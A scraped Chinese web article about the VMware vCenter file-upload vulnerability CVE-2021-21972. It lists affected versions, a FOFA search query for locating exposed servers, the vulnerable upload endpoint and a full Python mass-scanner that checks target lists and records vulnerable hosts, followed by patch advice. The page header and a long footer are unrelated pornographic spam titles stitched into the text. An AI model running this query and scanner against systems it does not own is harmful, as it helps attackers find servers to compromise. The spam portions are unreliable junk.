婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > 關于Vmware vcenter未授權任意文件上傳漏洞(CVE-2021-21972)的問題

關于Vmware vcenter未授權任意文件上傳漏洞(CVE-2021-21972)的問題

熱門標簽:南充電銷外呼系統 株洲電銷 南昌外呼系統定制 陜西辦理400電話 信陽電銷外呼系統怎么樣 貴陽網絡外呼系統軟件 宿州外呼系統公司 海外工廠地圖標注 地圖標注小程序

背景

CVE-2021-21972 vmware vcenter的一個未授權的命令執行漏洞。該漏洞可以上傳一個webshell至vcenter服務器的任意位置,然后執行webshell即可。

影響版本

vmware:esxi:7.0/6.7/6.5
vmware:vcenter_server:7.0/6.7/6.5

漏洞復現 fofa查詢

語法:title="+ ID_VC_Welcome +"

POC

https://x.x.x.x/ui/vropspluginui/rest/services/uploadova

使用https://github.com/QmF0c3UK/CVE-2021-21972-vCenter-6.5-7.0-RCE-POC腳本批量驗證

#-*- coding:utf-8 -*-
banner = """
    888888ba       dP           
    88  `8b      88           
    a88aaaa8P' .d8888b. d8888P .d8888b. dP  dP 
    88  `8b. 88' `88  88  Y8ooooo. 88  88 
    88  .88 88. .88  88     88 88. .88 
    88888888P `88888P8  dP  `88888P' `88888P' 
  ooooooooooooooooooooooooooooooooooooooooooooooooooooo 
        @time:2021/02/24 CVE-2021-21972.py
        C0de by NebulabdSec - @batsu         
 """
print(banner)

import threadpool
import random
import requests
import argparse
import http.client
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'

TARGET_URI = "/ui/vropspluginui/rest/services/uploadova"

def get_ua():
  first_num = random.randint(55, 62)
  third_num = random.randint(0, 3200)
  fourth_num = random.randint(0, 140)
  os_type = [
    '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',
    '(Macintosh; Intel Mac OS X 10_12_6)'
  ]
  chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)

  ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
          '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
         )
  return ua

def CVE_2021_21972(url):
  proxies = {"scoks5": "http://127.0.0.1:1081"}
  headers = {
    'User-Agent': get_ua(),
    "Content-Type": "application/x-www-form-urlencoded"
  }
  targetUrl = url + TARGET_URI
  try:
    res = requests.get(targetUrl,
              headers=headers,
              timeout=15,
              verify=False,
              proxies=proxies)
              # proxies={'socks5': 'http://127.0.0.1:1081'})
    # print(len(res.text))
    if res.status_code == 405:
      print("[+] URL:{}--------存在CVE-2021-21972漏洞".format(url))
      # print("[+] Command success result: " + res.text + "\n")
      with open("存在漏洞地址.txt", 'a') as fw:
        fw.write(url + '\n')
    else:
      print("[-] " + url + " 沒有發現CVE-2021-21972漏洞.\n")
  # except Exception as e:
  #   print(e)
  except:
    print("[-] " + url + " Request ERROR.\n")
def multithreading(filename, pools=5):
  works = []
  with open(filename, "r") as f:
    for i in f:
      func_params = [i.rstrip("\n")]
      # func_params = [i] + [cmd]
      works.append((func_params, None))
  pool = threadpool.ThreadPool(pools)
  reqs = threadpool.makeRequests(CVE_2021_21972, works)
  [pool.putRequest(req) for req in reqs]
  pool.wait()

def main():
  parser = argparse.ArgumentParser()
  parser.add_argument("-u",
            "--url",
            help="Target URL; Example:http://ip:port")
  parser.add_argument("-f",
            "--file",
            help="Url File; Example:url.txt")
  # parser.add_argument("-c", "--cmd", help="Commands to be executed; ")
  args = parser.parse_args()
  url = args.url
  # cmd = args.cmd
  file_path = args.file
  if url != None and file_path ==None:
    CVE_2021_21972(url)
  elif url == None and file_path != None:
    multithreading(file_path, 10) # 默認15線程

if __name__ == "__main__":
  main()

EXP 修復建議

vCenter Server7.0版本升級到7.0.U1c
vCenter Server6.7版本升級到6.7.U3l
vCenter Server6.5版本升級到6.5 U3n

到此這篇關于關于Vmware vcenter未授權任意文件上傳漏洞(CVE-2021-21972)的問題的文章就介紹到這了,更多相關Vmware vcenter上傳漏洞內容請搜索腳本之家以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持腳本之家!

標簽:石嘴山 三明 開封 鄭州 汕頭 拉薩 玉林 晉城

巨人網絡通訊聲明:本文標題《關于Vmware vcenter未授權任意文件上傳漏洞(CVE-2021-21972)的問題》,本文關鍵詞  關于,Vmware,vcenter,未,授權,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《關于Vmware vcenter未授權任意文件上傳漏洞(CVE-2021-21972)的問題》相關的同類信息!
  • 本頁收集關于關于Vmware vcenter未授權任意文件上傳漏洞(CVE-2021-21972)的問題的相關信息資訊供網民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    国产传媒一区在线| 国产调教视频一区| 国产精品系列在线观看| 欧美一区二区三区在线观看| 成人ar影院免费观看视频| 欧美一区国产二区| 国产精品久久夜| jlzzjlzz国产精品久久| 欧美激情一区二区三区全黄| 粉嫩蜜臀av国产精品网站| 日韩一区二区三区电影在线观看| 日本成人中文字幕在线视频| 欧美三级电影在线观看| 婷婷国产在线综合| 精品国产成人在线影院| av激情成人网| 亚洲男人天堂av网| 日本韩国精品在线| 婷婷综合久久一区二区三区| 一区二区三区丝袜| 一本久久a久久精品亚洲 | 亚洲色图在线视频| 欧美日韩一级片网站| 午夜欧美视频在线观看| 日韩欧美色综合| 懂色av一区二区三区免费看| 亚洲黄色录像片| 欧美日韩国产123区| 日本va欧美va精品发布| 国产农村妇女精品| 在线不卡免费av| 麻豆高清免费国产一区| 国产婷婷色一区二区三区在线| 91女人视频在线观看| 日韩av二区在线播放| 久久蜜桃一区二区| av在线不卡电影| 理论电影国产精品| 午夜久久久影院| 亚洲麻豆国产自偷在线| 国产情人综合久久777777| 欧美一级免费大片| 色婷婷精品久久二区二区蜜臀av| 美女网站视频久久| 亚洲成人在线网站| 亚洲精品老司机| 国产精品国产三级国产| 久久综合成人精品亚洲另类欧美| 欧美色电影在线| 色综合天天狠狠| 成人av集中营| 国产一区二区三区四区五区入口 | 粉嫩绯色av一区二区在线观看| 精品久久人人做人人爰| 欧美日韩精品一区二区三区 | 欧美久久久一区| 色偷偷成人一区二区三区91 | 91精品国产aⅴ一区二区| 丁香另类激情小说| 久久爱www久久做| 久久精品国产色蜜蜜麻豆| 日韩av中文字幕一区二区| 午夜精品福利在线| 首页综合国产亚洲丝袜| 日韩国产一区二| 全国精品久久少妇| 日韩va亚洲va欧美va久久| 午夜日韩在线电影| 日本中文字幕不卡| 国产尤物一区二区在线| 国产精品18久久久久久久久久久久 | 麻豆免费精品视频| 日韩激情中文字幕| 美女视频黄免费的久久| 激情小说亚洲一区| 国产a视频精品免费观看| 国产成人aaa| 99久久综合精品| 欧美色精品在线视频| 欧美老女人在线| 久久色在线观看| 中文字幕一区二区在线播放| 日韩毛片高清在线播放| 午夜国产精品一区| 国内精品视频一区二区三区八戒| 国产精品资源在线| 99久久99久久精品免费观看| 一本一道久久a久久精品 | 亚洲国产精品久久一线不卡| 亚洲综合视频在线| 亚洲成人一区在线| 亚洲午夜久久久久久久久电影网 | 亚洲丝袜另类动漫二区| 国产精品日韩精品欧美在线| 亚洲美女在线国产| 美腿丝袜亚洲一区| 成人毛片老司机大片| 一本色道a无线码一区v| 日韩一区二区中文字幕| 欧美激情一区二区三区在线| 日韩成人av影视| 99精品国产99久久久久久白柏 | 亚洲国产精华液网站w| 亚洲激情男女视频| 国内久久婷婷综合| 欧美日韩国产在线播放网站| 国产欧美一区二区在线| 亚洲四区在线观看| 美女性感视频久久| 欧美日韩在线播放一区| 精品欧美一区二区三区精品久久 | 久久理论电影网| 亚洲三级久久久| 久久精工是国产品牌吗| av在线不卡网| 国产欧美日韩在线视频| 亚洲一区二区在线观看视频| 日本欧美大码aⅴ在线播放| 国产成人自拍在线| 91精品福利在线一区二区三区| 国产亚洲人成网站| 日韩黄色小视频| 丁香婷婷深情五月亚洲| 日韩视频在线你懂得| 亚洲精品视频一区| 激情综合色综合久久综合| 一本一本大道香蕉久在线精品| 久久女同性恋中文字幕| 无吗不卡中文字幕| 色综合久久中文字幕| 久久久国产综合精品女国产盗摄| 美女视频黄久久| 欧美亚洲综合网| 亚洲美女少妇撒尿| 波多野结衣在线一区| 日本一区二区电影| 国产电影一区在线| 国产欧美日韩不卡免费| 国产宾馆实践打屁股91| 久久精品欧美日韩精品 | 精品一区二区久久久| 欧美日韩免费不卡视频一区二区三区 | 欧美日韩一区二区不卡| 国产精品白丝在线| 国产精品99久久久久| 精品国产三级电影在线观看| 国产一区二区精品久久| 欧美xxxxxxxx| 国产福利一区二区三区| 欧美韩日一区二区三区四区| aaa国产一区| 久久亚洲一区二区三区四区| 国产一区日韩二区欧美三区| 欧美激情一区二区三区在线| 成人美女视频在线看| 中文字幕日韩精品一区| 在线观看日韩电影| 亚洲高清久久久| 久久综合久久久久88| 国产精品538一区二区在线| 国产精品久久久久久久久免费桃花| 国产69精品一区二区亚洲孕妇| 亚洲女同ⅹxx女同tv| 成人国产精品视频| 国产精品理伦片| 制服丝袜国产精品| 国产精品性做久久久久久| 日韩毛片一二三区| 欧美一区二区三级| 国产美女在线观看一区| 亚洲美女精品一区| 精品久久久久久久人人人人传媒| 丁香婷婷综合色啪| 亚洲第一电影网| 国产午夜久久久久| 一本一道久久a久久精品| 极品销魂美女一区二区三区| 国产精品福利电影一区二区三区四区| 在线观看日韩一区| 国产中文字幕精品| 亚洲免费观看高清完整版在线| 欧美一级高清片| 91国偷自产一区二区三区成为亚洲经典| 日日骚欧美日韩| 成人免费小视频| 精品少妇一区二区三区在线视频| 一本大道久久a久久精二百| 久久国产精品99久久久久久老狼| 亚洲一区二区视频| 国产精品国产三级国产专播品爱网| 欧美一区二区视频免费观看| 色综合色综合色综合| 国产在线播精品第三| 婷婷夜色潮精品综合在线| 亚洲欧洲中文日韩久久av乱码| 久久久美女毛片| 91超碰这里只有精品国产| 国产成人自拍在线| 国产乱码精品一品二品| 久久99国产精品免费|